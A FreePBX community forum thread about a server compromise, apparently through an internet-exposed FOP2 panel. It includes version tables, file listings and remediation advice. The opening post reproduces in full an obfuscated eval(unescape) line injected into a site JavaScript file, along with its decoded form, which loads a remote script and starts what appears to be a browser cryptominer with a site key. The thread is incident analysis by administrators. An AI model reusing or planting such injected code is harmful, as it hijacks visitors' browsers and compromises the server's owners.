/var/www/html/admin/assets/js/modgettext.js altered. Hacked?

Hello all. I’m getting the following warning on one of my servers:

Module: “FreePBX Framework”, File: “/var/www/html/admin/assets/js/modgettext.js altered”.

Seems like I may have been compromised. Any ideas how this may have happened? I had the admin portal open to the internet, both on http and https, but I wouldn’t expect a bad actor to be able to modify my files in simply due to that.

I checked the file and I noticed this errant, clearly obfuscated and harmful, line quite a bit below the normal bottom of the file:

eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%5C%27%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%37%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%37%37%25%37%37%25%37%37%25%32%45%25%36%38%25%36%46%25%37%33%25%37%34%25%36%39%25%36%45%25%36%37%25%36%33%25%36%43%25%36%46%25%37%35%25%36%34%25%32%45%25%37%32%25%36%31%25%36%33%25%36%39%25%36%45%25%36%37%25%32%46%25%35%37%25%35%39%25%35%41%25%37%37%25%32%45%25%36%41%25%37%33%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%36%25%36%31%25%37%32%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%30%25%33%44%25%32%30%25%36%45%25%36%35%25%37%37%25%32%30%25%34%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%34%31%25%36%45%25%36%46%25%36%45%25%37%39%25%36%44%25%36%46%25%37%35%25%37%33%25%32%38%25%35%43%25%32%37%25%33%30%25%33%30%25%33%35%25%33%30%25%33%39%25%33%31%25%36%31%25%36%31%25%33%38%25%33%33%25%36%35%25%33%32%25%33%36%25%33%35%25%33%32%25%36%33%25%33%39%25%36%36%25%36%36%25%33%31%25%33%30%25%33%33%25%36%36%25%33%38%25%33%38%25%36%31%25%36%35%25%33%37%25%33%37%25%33%37%25%33%33%25%33%37%25%36%34%25%33%32%25%33%35%25%33%32%25%33%31%25%33%34%25%36%35%25%36%35%25%36%33%25%36%36%25%36%34%25%33%38%25%36%33%25%33%36%25%33%30%25%33%31%25%36%32%25%33%37%25%33%37%25%33%37%25%33%33%25%33%33%25%33%35%25%33%31%25%36%34%25%33%36%25%33%35%25%36%33%25%33%38%25%33%32%25%33%38%25%33%30%25%35%43%25%32%37%25%32%43%25%32%30%25%37%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%34%25%36%38%25%37%32%25%36%46%25%37%34%25%37%34%25%36%43%25%36%35%25%33%41%25%32%30%25%33%30%25%32%43%25%32%30%25%36%33%25%33%41%25%32%30%25%35%43%25%32%37%25%37%37%25%35%43%25%32%37%25%32%43%25%32%30%25%36%31%25%36%34%25%37%33%25%33%41%25%32%30%25%33%30%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%44%25%32%39%25%33%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%37%33%25%37%34%25%36%31%25%37%32%25%37%34%25%32%38%25%32%39%25%33%42%25%35%43%25%36%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%37%25%32%39%25%33%42%5C%27%29%29%3B%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));

Which, when unescaped a couple times, gives us something like:

document.write('\x3Cscript type="text/javascript">eval(`document.write('\x3Cscript src="https://www.hostingcloud.racing/WYZw.js">\x3C/script>\\n\x3Cscript>\\n    var _client = new Client.Anonymous(\\'005091aa83e2652c9ff103f88ae77737d25214eecfd8c601b7773351d65c8280\\', {\\n        throttle: 0, c: \\'w\\', ads: 0\\n    });\\n    _client.start();\\n\x3C/script>');\\`);\x3C/script>');

I can’t see the script at https://www.hostingcloud.racing/WYZw.js but I’m sure it’s not good.
Do you have any recommendations on further places to check for potential methods used to modify this file? Or what this script might actually be doing? I can’t access the script at the URL, but the site is still online.

Looks like that file was last modified 3 days ago.

Any suggestions or thoughts? If not, I figured it would be good to at least get this out there for any of the security experts to be aware of.

Also, do you think this calls for a total reinstall, or could I simply revert to a backup from a week ago and be sure to update any potentially out of date modules?

What versions of all modules are you running? Can you post output of fwconsole ma list ?

I actually found that another of my servers had been compromised in the same way. I’m sure they’re both out of date in more than one way. One is still on FPBX 14. Here is the list from one:

+----------------------+------------+--------------------------------------+-------------+-----------+
| Module               | Version    | Status                               | License     | Signature |
+----------------------+------------+--------------------------------------+-------------+-----------+
| accountcodepreserve  | 13.0.2.2   | Enabled                              | GPLv2       | Sangoma   |
| amd                  | 15.0.3     | Enabled                              | GPLv3+      | Sangoma   |
| announcement         | 15.0.3.13  | Enabled                              | GPLv3+      | Sangoma   |
| api                  | 15.0.9     | Enabled                              | AGPLv3+     | Sangoma   |
| areminder            | 15.0.14.27 | Enabled                              | Commercial  | Sangoma   |
| arimanager           | 15.0.3.13  | Enabled                              | GPLv3+      | Sangoma   |
| asterisk-cli         | 14.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| asteriskinfo         | 15.0.14    | Enabled                              | GPLv3+      | Sangoma   |
| backup               | 15.0.21.4  | Enabled                              | GPLv3+      | Sangoma   |
| blacklist            | 15.0.3     | Enabled                              | GPLv3+      | Sangoma   |
| broadcast            | 15.0.21    | Enabled                              | Commercial  | Sangoma   |
| builtin              |            | Enabled                              |             | Unsigned  |
| bulkhandler          | 15.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| calendar             | 15.0.4.23  | Enabled                              | GPLv3+      | Sangoma   |
| callback             | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| callerid             | 15.0.16    | Enabled                              | Commercial  | Sangoma   |
| callforward          | 15.0.16    | Enabled                              | AGPLv3+     | Sangoma   |
| calllimit            | 15.0.5.6   | Enabled                              | Commercial  | Sangoma   |
| callrecording        | 15.0.7.28  | Enabled                              | AGPLv3+     | Sangoma   |
| callwaiting          | 15.0.4.6   | Enabled                              | GPLv3+      | Sangoma   |
| campon               | 13.0.4.1   | Enabled                              | GPLv3+      | Sangoma   |
| cdr                  | 15.0.17.26 | Enabled                              | GPLv3+      | Sangoma   |
| cel                  | 15.0.15.17 | Enabled                              | GPLv3+      | Sangoma   |
| certman              | 15.0.49    | Enabled                              | AGPLv3+     | Sangoma   |
| cidlookup            | 15.0.25    | Enabled                              | GPLv3+      | Sangoma   |
| conferences          | 15.0.7.11  | Enabled                              | GPLv3+      | Sangoma   |
| conferencespro       | 15.0.3.18  | Enabled                              | Commercial  | Sangoma   |
| configedit           | 13.0.7.3   | Enabled                              | AGPLv3+     | Sangoma   |
| contactmanager       | 15.0.9.11  | Enabled                              | GPLv3+      | Sangoma   |
| core                 | 15.0.22.22 | Enabled                              | GPLv3+      | Sangoma   |
| cos                  | 15.0.15    | Enabled                              | Commercial  | Sangoma   |
| customappsreg        | 15.0.14    | Enabled                              | GPLv3+      | Sangoma   |
| cxpanel              | 15.0.4     | Enabled                              | GPLv3       | Sangoma   |
| dahdiconfig          | 15.0.5.8   | Enabled                              | GPLv3+      | Sangoma   |
| dashboard            | 15.0.15    | Enabled                              | AGPLv3+     | Sangoma   |
| daynight             | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| dictate              | 15.0.7     | Enabled                              | GPLv3+      | Sangoma   |
| digium_phones        | 13.0.7.4   | Disabled; Pending upgrade to 15.0.12 | GPLv2       | Sangoma   |
| digiumaddoninstaller | 13.0.1.4   | Enabled                              | GPLv2       | Sangoma   |
| directory            | 15.0.18    | Enabled                              | GPLv3+      | Sangoma   |
| disa                 | 15.0.4.9   | Enabled                              | AGPLv3+     | Sangoma   |
| donotdisturb         | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| dundicheck           | 2.11.0.3   | Enabled                              | GPLv3+      | Sangoma   |
| endpoint             | 15.0.24.19 | Enabled                              | Commercial  | Sangoma   |
| extensionroutes      | 15.0.8     | Enabled                              | Commercial  | Sangoma   |
| extensionsettings    | 13.0.4     | Enabled                              | GPLv3+      | Sangoma   |
| fax                  | 15.0.22    | Enabled                              | GPLv3+      | Sangoma   |
| faxpro               | 15.0.8.16  | Enabled                              | Commercial  | Sangoma   |
| featurecodeadmin     | 13.0.6.11  | Enabled                              | GPLv3+      | Sangoma   |
| filestore            | 15.0.4     | Enabled                              | AGPLv3      | Sangoma   |
| findmefollow         | 15.0.34    | Enabled                              | GPLv3+      | Sangoma   |
| firewall             | 15.0.42    | Enabled                              | AGPLv3+     | Sangoma   |
| framework            | 15.0.24    | Enabled                              | GPLv2+      | Sangoma   |
| freepbx_ha           | 13.0.11    | Enabled                              | Commercial  | Sangoma   |
| fw_langpacks         | 14.0.1     | Enabled                              | GPLv3+      | Sangoma   |
| hotelwakeup          | 15.0.5.5   | Enabled                              | GPLv2       | Sangoma   |
| iaxsettings          | 15.0.8     | Enabled                              | AGPLv3      | Sangoma   |
| infoservices         | 15.0.3     | Enabled                              | GPLv2+      | Sangoma   |
| irc                  | 13.0.1     | Enabled                              | GPLv3+      | Sangoma   |
| ivr                  | 15.0.30    | Enabled                              | GPLv3+      | Sangoma   |
| languages            | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| logfiles             | 15.0.15    | Enabled                              | GPLv3+      | Sangoma   |
| manager              | 15.0.17    | Enabled                              | GPLv2+      | Sangoma   |
| miscapps             | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| miscdests            | 15.0.2.12  | Enabled                              | GPLv3+      | Sangoma   |
| motif                | 13.0.3.2   | Enabled                              | GPLv3+      | Sangoma   |
| music                | 15.0.22    | Enabled                              | GPLv3+      | Sangoma   |
| outroutemsg          | 15.0.9     | Enabled                              | GPLv3+      | Sangoma   |
| paging               | 15.0.4.33  | Enabled                              | GPLv3+      | Sangoma   |
| pagingpro            | 15.0.2     | Enabled                              | Commercial  | Sangoma   |
| parking              | 15.0.15.4  | Enabled                              | GPLv3+      | Sangoma   |
| parkpro              | 15.0.13    | Enabled                              | Commercial  | Sangoma   |
| pbdirectory          | 2.11.0.6   | Enabled                              | GPLv3+      | Sangoma   |
| phonebook            | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| phpinfo              | 13.0.2     | Enabled                              | GPLv2+      | Sangoma   |
| pinsets              | 15.0.1.15  | Enabled                              | GPLv3+      | Sangoma   |
| pinsetspro           | 15.0.4     | Enabled                              | Commercial  | Sangoma   |
| pm2                  | 15.0.10    | Enabled                              | AGPLv3+     | Sangoma   |
| pms                  | 14.0.2.68  | Disabled; Pending upgrade to 15.0.5  | Commercial  | Sangoma   |
| presencestate        | 15.0.11    | Enabled                              | GPLv3+      | Sangoma   |
| printextensions      | 13.0.3.4   | Enabled                              | GPLv3+      | Sangoma   |
| queuemetrics         | 2.11.0.3   | Enabled                              | GPLv3+      | Sangoma   |
| queueprio            | 15.0.10    | Enabled                              | GPLv3+      | Sangoma   |
| queues               | 15.0.34    | Enabled                              | GPLv2+      | Sangoma   |
| queuestats           | 15.0.9     | Enabled                              | Commercial  | Sangoma   |
| qxact_reports        | 15.0.12    | Enabled                              | Commercial  | Sangoma   |
| recording_report     | 15.0.8     | Enabled                              | Commercial  | Sangoma   |
| recordings           | 15.0.3.19  | Enabled                              | GPLv3+      | Sangoma   |
| restapi              | 13.0.21.2  | Enabled                              | AGPLv3      | Sangoma   |
| restapps             |            | Not Installed (Locally available)    | Commercial  | Sangoma   |
| ringgroups           | 15.0.11.17 | Enabled                              | GPLv3+      | Sangoma   |
| setcid               | 15.0.9     | Enabled                              | GPLv3+      | Sangoma   |
| sipsettings          | 15.0.11    | Enabled                              | AGPLv3+     | Sangoma   |
| sipstation           | 15.0.11    | Enabled                              | Commercial  | Sangoma   |
| sms                  | 15.0.36    | Enabled                              | Commercial  | Sangoma   |
| soundlang            | 15.0.5.10  | Enabled                              | GPLv3+      | Sangoma   |
| speeddial            | 2.11.0.4   | Enabled                              | GPLv3+      | Sangoma   |
| superfecta           | 15.0.3     | Enabled                              | GPLv2+      | Sangoma   |
| sysadmin             | 15.0.29.12 | Enabled                              | Commercial  | Sangoma   |
| timeconditions       | 15.0.15.11 | Enabled                              | GPLv3+      | Sangoma   |
| tts                  | 15.0.12    | Enabled                              | GPLv3+      | Sangoma   |
| ttsengines           | 15.0.4.7   | Enabled                              | AGPLv3      | Sangoma   |
| ucp                  | 15.0.14.5  | Enabled                              | AGPLv3+     | Sangoma   |
| userman              | 15.0.69.7  | Enabled                              | AGPLv3+     | Sangoma   |
| vega                 | 15.0.12    | Enabled                              | Commercial+ | Sangoma   |
| vmblast              | 15.0.11.8  | Enabled                              | GPLv3+      | Sangoma   |
| vmnotify             | 15.0.15    | Enabled                              | Commercial  | Sangoma   |
| voicemail            | 15.0.27    | Enabled                              | GPLv3+      | Sangoma   |
| voicemail_report     | 15.0.7     | Enabled                              | Commercial  | Sangoma   |
| vqplus               | 15.0.7.30  | Enabled                              | Commercial  | Sangoma   |
| weakpasswords        | 13.0.2     | Enabled                              | GPLv3+      | Sangoma   |
| webcallback          | 15.0.6.3   | Enabled                              | Commercial  | Sangoma   |
| webrtc               | 15.0.10.9  | Enabled                              | GPLv3+      | Sangoma   |
| xmpp                 | 15.0.6.12  | Enabled                              | AGPLv3      | Sangoma   |
+----------------------+------------+--------------------------------------+-------------+-----------+

And the other:

+----------------------+------------+-------------------------------------+-------------+
| Module               | Version    | Status                              | License     |
+----------------------+------------+-------------------------------------+-------------+
| accountcodepreserve  | 13.0.2.2   | Enabled                             | GPLv2       |
| amd                  | 13.0.3     | Enabled                             | GPLv3+      |
| announcement         | 13.0.7.8   | Enabled                             | GPLv3+      |
| areminder            | 14.0.4.19  | Enabled                             | Commercial  |
| arimanager           | 13.0.5.4   | Enabled                             | GPLv3+      |
| asterisk-cli         | 14.0.1     | Enabled                             | GPLv3+      |
| asteriskinfo         | 13.0.7.2   | Enabled                             | GPLv3+      |
| backup               | 14.0.10.10 | Enabled                             | GPLv3+      |
| blacklist            | 14.0.5     | Enabled                             | GPLv3+      |
| broadcast            | 14.0.1.13  | Enabled                             | Commercial  |
| builtin              |            | Enabled                             |             |
| bulkhandler          | 13.0.24    | Enabled                             | GPLv3+      |
| calendar             | 14.0.3.9   | Enabled                             | GPLv3+      |
| callaccounting       | 14.0.18    | Enabled                             | Commercial+ |
| callback             | 13.0.5.5   | Enabled                             | GPLv3+      |
| callerid             | 13.0.8.20  | Enabled                             | Commercial  |
| callforward          | 14.0.1.3   | Enabled                             | AGPLv3+     |
| calllimit            | 13.0.5.7   | Enabled                             | Commercial  |
| callrecording        | 14.0.16    | Enabled                             | AGPLv3+     |
| callwaiting          | 14.0.1.1   | Enabled                             | GPLv3+      |
| campon               | 13.0.4.1   | Enabled                             | GPLv3+      |
| cdr                  | 14.0.5.22  | Enabled                             | GPLv3+      |
| cel                  | 14.0.4     | Enabled                             | GPLv3+      |
| certman              | 14.0.20    | Enabled                             | AGPLv3+     |
| cidlookup            | 14.0.1.12  | Enabled                             | GPLv3+      |
| conferences          | 13.0.23.17 | Enabled                             | GPLv3+      |
| conferencespro       | 14.0.2.13  | Enabled                             | Commercial  |
| configedit           | 13.0.7.1   | Enabled                             | AGPLv3+     |
| contactmanager       | 14.0.5.13  | Enabled                             | GPLv3+      |
| core                 | 14.0.29    | Enabled                             | GPLv3+      |
| cos                  | 13.0.12.7  | Enabled                             | Commercial  |
| customappsreg        | 13.0.5.7   | Enabled                             | GPLv3+      |
| cxpanel              | 14.0.4     | Enabled                             | GPLv3       |
| dahdiconfig          | 14.0.1.6   | Enabled                             | GPLv3+      |
| dashboard            | 14.0.10    | Enabled                             | AGPLv3+     |
| daynight             | 14.0.1     | Enabled                             | GPLv3+      |
| dictate              | 13.0.5     | Enabled                             | GPLv3+      |
| digium_phones        | 13.0.7.4   | Enabled                             | GPLv2       |
| digiumaddoninstaller | 13.0.1.1   | Enabled                             | GPLv2       |
| directory            | 13.0.19.12 | Enabled                             | GPLv3+      |
| disa                 | 13.0.6.12  | Enabled                             | AGPLv3+     |
| donotdisturb         | 14.0.1.1   | Enabled                             | GPLv3+      |
| dundicheck           | 2.11.0.3   | Enabled                             | GPLv3+      |
| endpoint             | 14.0.43.14 | Enabled                             | Commercial  |
| extensionroutes      | 13.0.10.7  | Enabled                             | Commercial  |
| extensionsettings    | 13.0.4     | Enabled                             | GPLv3+      |
| fax                  | 14.0.2.8   | Enabled                             | GPLv3+      |
| faxpro               | 14.0.13    | Enabled                             | Commercial  |
| featurecodeadmin     | 13.0.6.4   | Enabled                             | GPLv3+      |
| findmefollow         | 14.0.1.26  | Enabled                             | GPLv3+      |
| firewall             | 14.0.3.4   | Enabled                             | AGPLv3+     |
| framework            | 14.0.13.34 | Enabled                             | GPLv2+      |
| freepbx_ha           | 13.0.11    | Enabled                             | Commercial  |
| fw_langpacks         | 14.0.1     | Enabled                             | GPLv3+      |
| hotelwakeup          | 14.0.1.6   | Enabled                             | GPLv2       |
| iaxsettings          | 14.0.1.4   | Enabled                             | AGPLv3      |
| infoservices         | 13.0.1.4   | Enabled                             | GPLv2+      |
| irc                  | 13.0.1     | Enabled                             | GPLv3+      |
| ivr                  | 14.0.9.8   | Enabled                             | GPLv3+      |
| languages            | 14.0.1.5   | Enabled                             | GPLv3+      |
| logfiles             | 13.0.10.10 | Enabled                             | GPLv3+      |
| manager              | 13.0.2.10  | Enabled                             | GPLv2+      |
| miscapps             | 13.0.3.2   | Enabled                             | GPLv3+      |
| miscdests            | 13.0.9     | Enabled                             | GPLv3+      |
| motif                | 13.0.3.2   | Enabled                             | GPLv3+      |
| music                | 13.0.22.8  | Enabled                             | GPLv3+      |
| outroutemsg          | 14.0.1     | Enabled                             | GPLv3+      |
| paging               | 14.0.16.6  | Enabled                             | GPLv3+      |
| pagingpro            | 14.0.2.29  | Enabled                             | Commercial  |
| parking              | 13.0.19.11 | Enabled                             | GPLv3+      |
| parkpro              | 14.0.2.12  | Enabled                             | Commercial  |
| pbdirectory          | 2.11.0.6   | Enabled                             | GPLv3+      |
| phonebook            | 13.0.6.5   | Enabled                             | GPLv3+      |
| phpinfo              | 13.0.2     | Enabled                             | GPLv2+      |
| pinsets              | 13.0.13    | Enabled                             | GPLv3+      |
| pinsetspro           | 13.0.9.14  | Enabled                             | Commercial  |
| pm2                  | 13.0.7.1   | Enabled                             | AGPLv3+     |
| pms                  | 14.0.2.63  | Disabled; Pending upgrade to 14.0.3 | Commercial  |
| presencestate        | 14.0.1.10  | Enabled                             | GPLv3+      |
| printextensions      | 13.0.3.2   | Enabled                             | GPLv3+      |
| queuemetrics         | 2.11.0.3   | Enabled                             | GPLv3+      |
| queueprio            | 13.0.7     | Enabled                             | GPLv3+      |
| queues               | 14.0.2.31  | Enabled                             | GPLv2+      |
| queuestats           | 14.0.1.41  | Enabled                             | Commercial  |
| qxact_reports        | 14.0.7.21  | Enabled                             | Commercial  |
| recording_report     | 14.0.3.11  | Enabled                             | Commercial  |
| recordings           | 13.0.30.14 | Enabled                             | GPLv3+      |
| restapi              | 13.0.21.2  | Enabled                             | AGPLv3      |
| restapps             |            | Not Installed (Locally available)   | Commercial  |
| ringgroups           | 14.0.1.13  | Enabled                             | GPLv3+      |
| sangomacrm           | 14.0.25.20 | Enabled                             | Commercial  |
| setcid               | 13.0.6.3   | Enabled                             | GPLv3+      |
| sipsettings          | 14.0.27.29 | Enabled                             | AGPLv3+     |
| sipstation           | 14.0.4.5   | Enabled                             | Commercial  |
| sms                  | 14.0.5     | Enabled                             | Commercial  |
| soundlang            | 14.0.10    | Enabled                             | GPLv3+      |
| speeddial            | 2.11.0.4   | Enabled                             | GPLv3+      |
| superfecta           | 14.0.30    | Enabled                             | GPLv2+      |
| sysadmin             | 14.0.39.3  | Enabled                             | Commercial  |
| timeconditions       | 14.0.2.19  | Enabled                             | GPLv3+      |
| tts                  | 13.0.15    | Enabled                             | GPLv3+      |
| ttsengines           | 13.0.7.5   | Enabled                             | AGPLv3      |
| ucp                  | 14.0.3.21  | Enabled                             | AGPLv3+     |
| userman              | 14.0.13    | Enabled                             | AGPLv3+     |
| vega                 | 14.0.3.24  | Enabled                             | Commercial+ |
| vmblast              | 13.0.11    | Enabled                             | GPLv3+      |
| vmnotify             | 14.0.1.7   | Enabled                             | Commercial  |
| voicemail            | 14.0.7     | Enabled                             | GPLv3+      |
| voicemail_report     | 14.0.6     | Enabled                             | Commercial  |
| vqplus               | 14.0.4.15  | Enabled                             | Commercial  |
| weakpasswords        | 13.0.2     | Enabled                             | GPLv3+      |
| webcallback          | 13.0.11.5  | Enabled                             | Commercial  |
| webrtc               | 14.0.3.8   | Enabled                             | GPLv3+      |
| zulu                 | 14.0.58.3  | Enabled                             | Commercial  |
+----------------------+------------+-------------------------------------+-------------+

1 Like

PM Sent

Can we not have this be hidden through PMs. If a exploit exist its paramount that this is all kept in the community eyes so others can assist and chime in. Users need to know if some new exploit is discovered or not.

4 Likes

Hi @tonyclewis and anyone else coming across this thread, I agree that transparency is important. I think the ‘hidden’ aspect was mainly to enable safe sharing of potentially sensitive details from log files and so on.

Regardless, the attack vector was actually determined to be an unsecured, open to the internet, fop2 instance. I’d recommend that if you are running FOP2, be sure to only enable access via a whitelist. This is definitely the normal best practice, but I cut a few corners to make some customers happy and now I’m paying the price.

I’ll be reaching out to the folks at Asternic and letting them know some of the more specific details to hopefully enable them to fix this problem.

Be safe out there.

4 Likes

Can we get some more details on this? Such as what is the attack vector in FOP2? Does this impact FOP2 instances running on HTTPS? Was this the user or admin interface that was compromised? What version of FOP2 is this happening on?

2 Likes

Hi @BlazeStudios.

I don’t think we know what range of versions it impacts. The version impacted in my case is 2.31.30. A few minor versions behind the latest FOP2 version.

The attack vector was a POST request to /fop2/lang/ko.php. Earlier in the day the server was scanned from the attacking IP via 2 HEAD requests to /fop2/JSON.php

Unfortunately, the ko.php file is obfuscated, so it’s hard to tell what is actually happening there.

I was running FOP2 with https, as described in my post here:

Meaning that HTTPS was being used, however, I also had insecure access enabled to the “Web Management” service in the firewall, which I think may mean that fop2 would have been accessible without HTTPS.

I don’t think either of the the interfaces were actually compromised, just a post request to that PHP file.

Following this closely as we have a PBX with the same.

Well I think this is something from older versions. I just compared a couple boxes. The first box had FOP2 installed back around 2017 (it isn’t running now but still installed) and I found this ko.php file in the lang directory. It is neither a proper language file nor is it encrypted/obfuscated. It is just a minified version of the code that makes it hard to read and figure out what is really going on. There is also an index.php file in there that isn’t supposed to be.

The second box had a new version of FOP2 installed back in 2020, that one is running and has the latest release (2.31.33), it was running 2.31.30 before that. There is no ko.php or index.php file in the lang directory.

On the compromised box, it happened back in 2019 based on the file dates. About 8 months before I did a new install on a different system and just moved the license. So do you have an index.php in your lang directory? What is the timestamp on the ko.php and index.php (if you have one)?

Had very high CPU Usage from /var/tmp/php. Killed those processes and locked down FOP2 from only known IPs. Found files in /var/tmp/systemd-private-ef50f4158f904467b082dac1f3946076-httpd.service-huuOR9/tmp that were config.json and php. Both time stamped today, the php right before the problem started happening. The php is not readable. The config.json file contained a hard coded IP that is “212.32.255.5”, which is located in Europe - certain that is not our IP. Can I kill these since they are in tmp?

My FOP2 version was just updated and is the most recent, 2.31.33

My box is 3 years old and FOP2 is updated each time an update comes out.

ko.php is 125kb, time stamped 6/28/2020, just like all other files in directory, except the it.php file is time stamped 11/5/2020. I echo the comments when trying to ready ko.php

Well the ko.php is the result of the attack not the attack vector. So something else is the cause and the ko.php was the compromise to the system. But both you and I have boxes that were hit years ago on older versions. It’s why I’m looking for more details from the OP.

-rw-rw-r-- 1 asterisk asterisk   2393 Jun 28  2020 da.php
-rw-rw-r-- 1 asterisk asterisk   2539 Jun 28  2020 de.php
-rw-rw-r-- 1 asterisk asterisk   3848 Jun 28  2020 el.php
-rw-rw-r-- 1 asterisk asterisk     50 Jun 28  2020 en.php
-rw-rw-r-- 1 asterisk asterisk   4618 Jun 28  2020 es.php
-rw-rw-r-- 1 asterisk asterisk   4226 Jun 28  2020 fr_FR.php
-rw-rw-r-- 1 asterisk asterisk   2582 Jun 28  2020 he.php
-rw-r--r-- 1 asterisk asterisk    418 Jun 28  2020 index.php
-rw-rw-r-- 1 asterisk asterisk   2497 Nov  5  2020 it.php
-rw-r--r-- 1 asterisk asterisk 127283 Jun 28  2020 ko.php
-rw-rw-r-- 1 asterisk asterisk   2424 Jun 28  2020 nl.php
-rw-rw-r-- 1 asterisk asterisk   2477 Jun 28  2020 pl.php
-rw-rw-r-- 1 asterisk asterisk   3193 Jun 28  2020 pt_BR.php
-rw-rw-r-- 1 asterisk asterisk   6122 Jun 28  2020 ru.php
-rw-rw-r-- 1 asterisk asterisk   2434 Jun 28  2020 zh.php

Seems to match the same as what I’m seeing @xptpa2020. I’m getting that high cpu usage as well, did you kill those services and delete those files? Any other problems cropping up?

@BlazeStudios I do have an index.php. Are you saying that you think the ko.php and index files were maliciously inserted on the server years ago?

Killed services. Deleted files. CPU down to 0.1, from 12.5. Trying to anticipate the next move to ensure tomorrow is not a difficult day. I have email Nic at Asternic and waiting for a response. I referred this page for better data than I am capable to providing alone.

I think I’ll drop to a backup and lock down fop2. But if these files, like ko.php and index.php, are malicious, then perhaps I should reinstall FOP2 as well.

Thanks for reaching out to Nic, please update us as you learn new info from him.

Yes, I do not see these files on a newer box. The index.php file is actually a form handler that allows the bad actor to upload files to directories they specify and can get access to. It’s not part of the FOP2 package. ko.php is also not part of the package.

Our old Dutch/Finnish/Russian friends behind AS60781 again, not the first time, unlikely the last one. . .

(FWIW I drop them at my DO firewall)

Please share your blocking setup at your firewall

https://www.enjen.net/asn-blocklist/index.php?asn=60781&type=iptables

Big enough that you should prefer an ipset

https://www.enjen.net/asn-blocklist/index.php?asn=60781&type=ipset